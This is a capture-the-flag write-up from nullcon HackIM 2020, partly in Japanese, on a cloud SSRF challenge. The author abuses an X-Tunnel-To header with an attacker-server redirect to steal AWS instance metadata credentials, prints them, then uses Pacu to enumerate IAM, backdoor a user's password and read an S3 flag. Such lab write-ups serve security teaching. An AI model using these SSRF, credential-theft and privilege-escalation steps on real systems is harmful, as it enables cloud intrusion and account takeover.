

nullcon HackIM 2020 Writeup - Lateral Movement


Uncover the new path.

Note: no need to bruteforce tenant. The tenant can be any string.






function  buildActionRequest(tenant, tag, typ, action, options) {
            var path;
            var request;
            path = "/api/1/";
            if (tenant && tag)
                path += tenant+tag + "/";
            path += typ + "?action\x3d" + action;
            request = {
                protocol: this.context.protocol,
                hostname: this.context.hostname,
                port: this.context.port,
                path: path,
                method: "POST",
                headers: {
                    "Accept": "application/json",
                    "Content-type": "application/json",
            if (this.context.authToken)
                request.headers.Authorization = this.context.authToken;
            if (this.context.tunnelTo)
                request.headers["X-Tunnel-To"] = this.context.tunnelTo;
            if (options) {
                if (options.headers)
                    Object.keys(options.headers).forEach(function(k) {
                        if (options.headers[k])
                            request.headers[k] = options.headers[k];
                            delete request.headers[k]
                if (options.method)
                    request.method = options.method;
                if (options.path)
                    request.path = options.path;
                if (options.data)
                    request.data = options.data
            return request


root@kali:~# curl -H 'X-Tunnel-To: hoge' -H 'Content-Type: application/json' -H 'Accept: application/json' '' -d '{"ccc":"ddd"}'


root@kali:~# curl -H 'X-Tunnel-To: localhost' -H 'Content-Type: application/json' -H 'Accept: application/json' '' -d '{"ccc":"ddd"}'
Not permitted!

root@kali:~# curl -H 'X-Tunnel-To: example.com' -H 'Content-Type: application/json' -H 'Accept: application/json' '' -d '{"ccc":"ddd"}'
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
                <title>404 - Not Found</title>
                <h1>404 - Not Found</h1>
                <script type="text/javascript" src="//wpc.75674.betacdn.net/0075674/www/ec_tpm_bcon.js"></script>

Move laterally within the cloud.というヒントが出ており、AWSインスタンスメタデータが怪しい。

root@kali:~# curl -H 'X-Tunnel-To:' -H 'Content-Type: application/json' -H 'Accept: application/json' '' -d '{"ccc":"ddd"}'
So smart, But still Internal not permitted!



root@ip-172-31-26-179:~# cat /var/www/html/api/1/metadata.php
header('Location:'.$_GET["q"], TRUE, 303);


root@ip-172-31-26-179:~# curl -H 'X-Tunnel-To: <attacker-server>' ''


root@ip-172-31-26-179:~# curl -H 'X-Tunnel-To: <attacker-server>' ''
  "Code" : "Success",
  "LastUpdated" : "2020-02-08T14:39:41Z",
  "Type" : "AWS-HMAC",
  "SecretAccessKey" : "YnHSOXfK1L06PVYJ(snip)",
  "Token" : "IQoJb3JpZ2luX2VjEC8aCXVzLWVhc3QtMiJHMEUCIQDAF8T+X3zFRfBeNrFz8qeG66VZMerjIO2UrpjZC0c5VwIgdI9iR9VVbT2db7ppnZxj3mE7yBPbvzXqAUCa/v4l/coqvQMI2P//////////ARAAGgwyMTE4MzQzMDYwMzAiDHhVCl2VO7silpXomiqRA4XolMzX5R5MwDD5gg5diaM1jjvsWq+0uJrzpg/l7ULAScCnp18v2I0SdyDb0TmERoGhgP3o2g2gHAtqZgVEDQe//1wG3DBeQ+GLmplMbpgs3+cZcqhKBG5CmMwusCBNTbiJTlkHzYe5bExR24YschWAmVnU+GSoBSvvQiIanJyV8ALDnvjt/5E8y6gnWm/KCCxjTaGwL3JormkaHWxCnEo/ayt+NY6+dZwe4z5+0UnhxokBvyCQDISPRH4zwLJNUiZ/whyTyQIsn1DDFicNQlUngWl3Ek0uvqBp/JtKSVpMRlF5j5jdE3rAnBoqF6nvfUlYl7LRVONfNw0rK6L0NdKSBtrXhBtdJuz5ZWVxBiB4z3V6ieoNzUGti9ivRAGPevsRtWkH3jXItJQEgJ9NbQEJCmj5VrYZs+SFHi347P/xjYHjzHNT/NWjPxMNemSb94JaKqb90hFjqgF9CkFgtq4q7R2pSlKy/H3UXwkE5bYuAI+DjtaTNz6KPSYLY16ReGGknhqy6D3v/quDMHmF/6mkMKmQ+/EFOusBN5piQfRQKrwm862otyDB1HTKTtUdSAj9y/ACwcN6LUAZBQdXwMyL5QWMWk6j30LUl1ODHg1MtpydMNbVdwYM3jSZLSPgmAsD6QW6/jB/ECdAWsnBgNH7VvmccAZtuFFlYFh+zJmaTkYHFMMAkPG17oWDfJO0ofZlFq99DxuJ4OZDnp47zxEEN9C2vLcEBRV6644pbK4qo9e3ZLS1vy0zMJEd6wLcU4G3U3HFz0xfyANMV2d+m0ps+66WJb1nSr/xY8JxFAPrn24ehFdeDbsSJdMEI7mYjssrsinBjPwNCOIGE/TEjMPofVzvpQ==",
  "Expiration" : "2020-02-08T20:39:42Z"





root@kali:~/pacu# python3 pacu.py


No database found at /root/pacu/sqlite.db
Database created at /root/pacu/sqlite.db

What would you like to name this new session? hackim
Session hackim created.

        Pacu - https://github.com/RhinoSecurityLabs/pacu
        Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/

        This was built as a modular, open source tool to assist in penetration testing an AWS environment.
        For usage and developer documentation, please visit the GitHub page.

        Modules that have pre-requisites will have those listed in that modules help info, but if it is
        executed before its pre-reqs have been filled, it will prompt you to run that module then continue
        once that is finished, so you have the necessary data for the module you want to run.

        Pacu command info:
            list/ls                             List all modules
            load_commands_file <file>           Load an existing file with list of commands to execute
            search [cat[egory]] <search term>   Search the list of available modules by name or category
            help                                Display this page of information
            help <module name>                  Display information about a module
            whoami                              Display information regarding to the active access keys
            data                                Display all data that is stored in this session. Only fields
                                                  with values will be displayed
            data <service>|proxy                Display all data for a specified service or for PacuProxy
                                                  in this session
            services                            Display a list of services that have collected data in the
                                                  current session to use with the "data" command
            regions                             Display a list of all valid AWS regions
            update_regions                      Run a script to update the regions database to the newest
            set_regions <region> [<region>...]  Set the default regions for this session. These space-separated
                                                  regions will be used for modules where regions are required,
                                                  but not supplied by the user. The default set of regions is
                                                  every supported region for the service. Supply "all" to this
                                                  command to reset the region set to the default of all
                                                  supported regions
            run/exec <module name>              Execute a module
            set_keys                            Add a set of AWS keys to the session and set them as the
            swap_keys                           Change the currently active AWS key to another key that has
                                                  previously been set for this session
            import_keys <profile name>|--all    Import AWS keys from the AWS CLI credentials file (located
                                                  at ~/.aws/credentials) to the current sessions database.
                                                  Enter the name of a profile you would like to import or
                                                  supply --all to import all the credentials in the file.
            exit/quit                           Exit Pacu

        Other command info:
            aws <command>                       Run an AWS CLI command directly. Note: If Pacu detects "aws"
                                                  as the first word of the command, the whole command will
                                                  instead be run in a shell so that you can use the AWS CLI
                                                  from within Pacu. Due to the command running in a shell,
                                                  this enables you to pipe output where needed. An example
                                                  would be to run an AWS CLI command and pipe it into "jq"
                                                  to parse the data returned. Warning: The AWS CLI's
                                                  authentication is not related to Pacu. Be careful to
                                                  ensure that you are using the keys you want when using
                                                  the AWS CLI. It is suggested to use AWS CLI profiles
                                                  to solve this problem

        [ADVANCED] PacuProxy command info:
            proxy [help]                        Control PacuProxy/display help
                start <ip> [port]                 Start the PacuProxy listener - port 80 by default.
                                                    The listener will attempt to start on the IP
                                                    supplied, but some hosts don't allow this. In
                                                    this case, PacuProxy will listen on and
                                                    use the supplied IP to stage agents and it should
                                                    work the same
                stop                              Stop the PacuProxy listener
                kill <agent_id>                   Kill an agent (stop it from running on the host)
                list/ls                           List info on remote agent(s)
                use none|<agent_id>               Use a remote agent, identified by unique integers
                                                    (use "proxy list" to see them). Choose "none" to
                                                    no longer use any proxy (route from the local
                                                    host instead)
                shell <agent_id> <command>        Run a shell command on the remote agent
                fetch_ec2_keys <agent_id>         Try to read the meta-data of the target agent to
                                                    request a set of temporary credentials for the
                                                    attached instance profile (if there is one),
                                                    then save them to the Pacu database and set
                                                    them as the active key pair
                stager sh|ps                      Generate a PacuProxy stager. The "sh" format is
                                                    for *sh shells in Unix (like bash), and the "ps"
                                                    format is for PowerShell on Windows

Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...
  User agent for this session set to:
    aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10


Pacu (hackim:No Keys Set) > set_keys
Setting AWS Keys...
Press enter to keep the value currently stored.
Enter the letter C to clear the value, rather than set it.
If you enter an existing key_alias, that key's fields will be updated instead of added.

Key alias [None]: limited-role
Secret access key [None]: YnHSOXfK1L06PVYJ(snip)
Session token (Optional - for temp AWS keys only) [None]: IQoJb3JpZ2luX2VjEC8aCXVzLWVhc3QtMiJHMEUCIQDAF8T+X3zFRfBeNrFz8qeG66VZMerjIO2UrpjZC0c5VwIgdI9iR9VVbT2db7ppnZxj3mE7yBPbvzXqAUCa/v4l/coqvQMI2P//////////ARAAGgwyMTE4MzQzMDYwMzAiDHhVCl2VO7silpXomiqRA4XolMzX5R5MwDD5gg5diaM1jjvsWq+0uJrzpg/l7ULAScCnp18v2I0SdyDb0TmERoGhgP3o2g2gHAtqZgVEDQe//1wG3DBeQ+GLmplMbpgs3+cZcqhKBG5CmMwusCBNTbiJTlkHzYe5bExR24YschWAmVnU+GSoBSvvQiIanJyV8ALDnvjt/5E8y6gnWm/KCCxjTaGwL3JormkaHWxCnEo/ayt+NY6+dZwe4z5+0UnhxokBvyCQDISPRH4zwLJNUiZ/whyTyQIsn1DDFicNQlUngWl3Ek0uvqBp/JtKSVpMRlF5j5jdE3rAnBoqF6nvfUlYl7LRVONfNw0rK6L0NdKSBtrXhBtdJuz5ZWVxBiB4z3V6ieoNzUGti9ivRAGPevsRtWkH3jXItJQEgJ9NbQEJCmj5VrYZs+SFHi347P/xjYHjzHNT/NWjPxMNemSb94JaKqb90hFjqgF9CkFgtq4q7R2pSlKy/H3UXwkE5bYuAI+DjtaTNz6KPSYLY16ReGGknhqy6D3v/quDMHmF/6mkMKmQ+/EFOusBN5piQfRQKrwm862otyDB1HTKTtUdSAj9y/ACwcN6LUAZBQdXwMyL5QWMWk6j30LUl1ODHg1MtpydMNbVdwYM3jSZLSPgmAsD6QW6/jB/ECdAWsnBgNH7VvmccAZtuFFlYFh+zJmaTkYHFMMAkPG17oWDfJO0ofZlFq99DxuJ4OZDnp47zxEEN9C2vLcEBRV6644pbK4qo9e3ZLS1vy0zMJEd6wLcU4G3U3HFz0xfyANMV2d+m0ps+66WJb1nSr/xY8JxFAPrn24ehFdeDbsSJdMEI7mYjssrsinBjPwNCOIGE/TEjMPofVzvpQ==

Keys saved to database.


Pacu (hackim:limited-role) > run iam__enum_users_roles_policies_groups
  Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 1 users
[iam__enum_users_roles_policies_groups] Found 3 roles
[iam__enum_users_roles_policies_groups] Found 3 policies
[iam__enum_users_roles_policies_groups] Found 3 groups
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.

[iam__enum_users_roles_policies_groups] MODULE SUMMARY:

  1 Users Enumerated
  3 Roles Enumerated
  3 Policies Enumerated
  3 Groups Enumerated
  IAM resources saved in Pacu database.


Pacu (hackim:limited-role) > data

Session data:
aws_keys: [
    <AWSKey: limited-role>
id: 1
created: "2020-02-08 15:10:24.095578"
is_active: true
name: "hackim"
boto_user_agent: "aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10"
key_alias: "limited-role"
access_key_id: "ASIATCUSO7XXPHMSQ3XC"
secret_access_key: "******" (Censored)
session_token: "IQoJb3JpZ2luX2VjEC8aCXVzLWVhc3QtMiJHMEUCIQDAF8T+X3zFRfBeNrFz8qeG66VZMerjIO2UrpjZC0c5VwIgdI9iR9VVbT2db7ppnZxj3mE7yBPbvzXqAUCa/v4l/coqvQMI2P//////////ARAAGgwyMTE4MzQzMDYwMzAiDHhVCl2VO7silpXomiqRA4XolMzX5R5MwDD5gg5diaM1jjvsWq+0uJrzpg/l7ULAScCnp18v2I0SdyDb0TmERoGhgP3o2g2gHAtqZgVEDQe//1wG3DBeQ+GLmplMbpgs3+cZcqhKBG5CmMwusCBNTbiJTlkHzYe5bExR24YschWAmVnU+GSoBSvvQiIanJyV8ALDnvjt/5E8y6gnWm/KCCxjTaGwL3JormkaHWxCnEo/ayt+NY6+dZwe4z5+0UnhxokBvyCQDISPRH4zwLJNUiZ/whyTyQIsn1DDFicNQlUngWl3Ek0uvqBp/JtKSVpMRlF5j5jdE3rAnBoqF6nvfUlYl7LRVONfNw0rK6L0NdKSBtrXhBtdJuz5ZWVxBiB4z3V6ieoNzUGti9ivRAGPevsRtWkH3jXItJQEgJ9NbQEJCmj5VrYZs+SFHi347P/xjYHjzHNT/NWjPxMNemSb94JaKqb90hFjqgF9CkFgtq4q7R2pSlKy/H3UXwkE5bYuAI+DjtaTNz6KPSYLY16ReGGknhqy6D3v/quDMHmF/6mkMKmQ+/EFOusBN5piQfRQKrwm862otyDB1HTKTtUdSAj9y/ACwcN6LUAZBQdXwMyL5QWMWk6j30LUl1ODHg1MtpydMNbVdwYM3jSZLSPgmAsD6QW6/jB/ECdAWsnBgNH7VvmccAZtuFFlYFh+zJmaTkYHFMMAkPG17oWDfJO0ofZlFq99DxuJ4OZDnp47zxEEN9C2vLcEBRV6644pbK4qo9e3ZLS1vy0zMJEd6wLcU4G3U3HFz0xfyANMV2d+m0ps+66WJb1nSr/xY8JxFAPrn24ehFdeDbsSJdMEI7mYjssrsinBjPwNCOIGE/TEjMPofVzvpQ=="
session_regions: [
IAM: {
    "Users": [
            "Path": "/",
            "UserName": "poorUser",
            "UserId": "AIDATCUSO7XXPAUMHXSZ2",
            "Arn": "arn:aws:iam::211834306030:user/poorUser",
            "CreateDate": "Thu, 23 Jan 2020 15:42:45",
            "PasswordLastUsed": "Sat, 08 Feb 2020 14:12:41"
    "Roles": [
            "Path": "/aws-service-role/support.amazonaws.com/",
            "RoleName": "AWSServiceRoleForSupport",
            "RoleId": "AROATCUSO7XXKU7K6BBJM",
            "Arn": "arn:aws:iam::211834306030:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
            "CreateDate": "Thu, 23 Jan 2020 11:20:05",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "support.amazonaws.com"
                        "Action": "sts:AssumeRole"
            "Description": "Enables resource access for AWS to provide billing, administrative and support services",
            "MaxSessionDuration": 3600
            "Path": "/aws-service-role/trustedadvisor.amazonaws.com/",
            "RoleName": "AWSServiceRoleForTrustedAdvisor",
            "RoleId": "AROATCUSO7XXCDG4HOBDW",
            "Arn": "arn:aws:iam::211834306030:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
            "CreateDate": "Thu, 23 Jan 2020 11:20:05",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "trustedadvisor.amazonaws.com"
                        "Action": "sts:AssumeRole"
            "Description": "Access for the AWS Trusted Advisor Service to help reduce cost, increase performance, and improve security of your AWS environment.",
            "MaxSessionDuration": 3600
            "Path": "/",
            "RoleName": "limited-role",
            "RoleId": "AROATCUSO7XXK6KY3Y54E",
            "Arn": "arn:aws:iam::211834306030:role/limited-role",
            "CreateDate": "Thu, 23 Jan 2020 16:16:29",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ec2.amazonaws.com"
                        "Action": "sts:AssumeRole"
            "Description": "Allows EC2 instances to call AWS services on your behalf.",
            "MaxSessionDuration": 3600
    "Policies": [
            "PolicyName": "limited-role-2",
            "PolicyId": "ANPATCUSO7XXEQI2GQ6A6",
            "Arn": "arn:aws:iam::211834306030:policy/limited-role-2",
            "Path": "/",
            "DefaultVersionId": "v11",
            "AttachmentCount": 2,
            "IsAttachable": true,
            "CreateDate": "Sat, 08 Feb 2020 07:15:23",
            "UpdateDate": "Sat, 08 Feb 2020 07:50:32"
            "PolicyName": "limiteds3",
            "PolicyId": "ANPATCUSO7XXJVJ3W23VX",
            "Arn": "arn:aws:iam::211834306030:policy/limiteds3",
            "Path": "/",
            "DefaultVersionId": "v1",
            "IsAttachable": true,
            "CreateDate": "Thu, 23 Jan 2020 21:20:26",
            "UpdateDate": "Thu, 23 Jan 2020 21:20:26"
            "PolicyName": "limited",
            "PolicyId": "ANPATCUSO7XXKNAARZWEA",
            "Arn": "arn:aws:iam::211834306030:policy/limited",
            "Path": "/",
            "DefaultVersionId": "v12",
            "AttachmentCount": 1,
            "IsAttachable": true,
            "CreateDate": "Thu, 23 Jan 2020 15:40:20",
            "UpdateDate": "Sat, 08 Feb 2020 07:11:05"
    "Groups": [
            "Path": "/",
            "GroupName": "limited2",
            "GroupId": "AGPATCUSO7XXM4A7JKWKI",
            "Arn": "arn:aws:iam::211834306030:group/limited2",
            "CreateDate": "Sat, 08 Feb 2020 07:16:17"
            "Path": "/",
            "GroupName": "limiteds3g",
            "GroupId": "AGPATCUSO7XXCJPDNISWZ",
            "Arn": "arn:aws:iam::211834306030:group/limiteds3g",
            "CreateDate": "Thu, 23 Jan 2020 21:21:19"
            "Path": "/",
            "GroupName": "priv",
            "GroupId": "AGPATCUSO7XXIZJZ6F56S",
            "Arn": "arn:aws:iam::211834306030:group/priv",
            "CreateDate": "Thu, 23 Jan 2020 15:40:53"

Proxy data:
  "IP": "",
  "Port": 80,
  "Listening": false,
  "SSHUsername": "",
  "SSHPassword": "",
  "TargetAgent": []



Pacu (hackim:limited-role) > run iam__privesc_scan
  Running module iam__privesc_scan...
[iam__privesc_scan] No permissions detected yet.
[iam__privesc_scan] Data (Current User/Role > Permissions) not found, run module "iam__enum_permissions" to fetch it? (y/n) y
[iam__privesc_scan]   Running module iam__enum_permissions...
[iam__enum_permissions] Confirming permissions for roles:
[iam__enum_permissions]   limited-role...
[iam__enum_permissions]     Confirmed permissions for limited-role
[iam__enum_permissions] iam__enum_permissions completed.

[iam__enum_permissions] MODULE SUMMARY:

  Confirmed permissions for 0 user(s).
  Confirmed permissions for role: limited-role.

[iam__privesc_scan] Escalation methods for current role:
[iam__privesc_scan]   CONFIRMED: UpdateLoginProfile
[iam__privesc_scan] Attempting confirmed privilege escalation methods...

[iam__privesc_scan]   Starting method UpdateLoginProfile...

[iam__privesc_scan]     Is there a specific user you want to target? They must already have a login profile (password for logging into the AWS Console). Enter their user name now or just hit enter to enumerate users and view a list of options:
[iam__privesc_scan] Found 1 user(s). Choose a user below.
[iam__privesc_scan]   [0] Other (Manually enter user name)
[iam__privesc_scan]   [1] All Users
[iam__privesc_scan]   [2] poorUser
[iam__privesc_scan] Choose an option: 2
[iam__privesc_scan]   Running module iam__backdoor_users_password...
[iam__backdoor_users_password] Modifying an IAM user's current password
[iam__backdoor_users_password]   User: poorUser
[iam__backdoor_users_password]     Password successfully changed
[iam__backdoor_users_password]     Password: hqw.yE.a##CfW$V3q"npK_"k"/=&d*4UV0MSItR{(ueW}Gd0[(snip)
[iam__backdoor_users_password] iam__backdoor_users_password completed.

[iam__backdoor_users_password] MODULE SUMMARY:

  1 user(s) backdoored.

[iam__privesc_scan] iam__privesc_scan completed.

[iam__privesc_scan] MODULE SUMMARY:

  Privilege escalation was successful

変更したパスワードで、AWSの管理コンソールにログインする。 f:id:graneed:20200209002646p:plain

poorUserの権限を確認するため、まずはpoorUserが所属しているIAMグループを確認する。 f:id:graneed:20200209002819p:plain


limiteds3gグループにはAmazonS3ReadOnlyAccessがアタッチされている。 f:id:graneed:20200209003007p:plain

limited2グループには以下の画像のActionが可能なポリシーがアタッチされている。 f:id:graneed:20200209003039p:plain

S3が読めるようなので、S3の画面に遷移すると、怪しいS3バケットを発見する。 f:id:graneed:20200209003313p:plain

flag.txtを発見! f:id:graneed:20200209003345p:plain

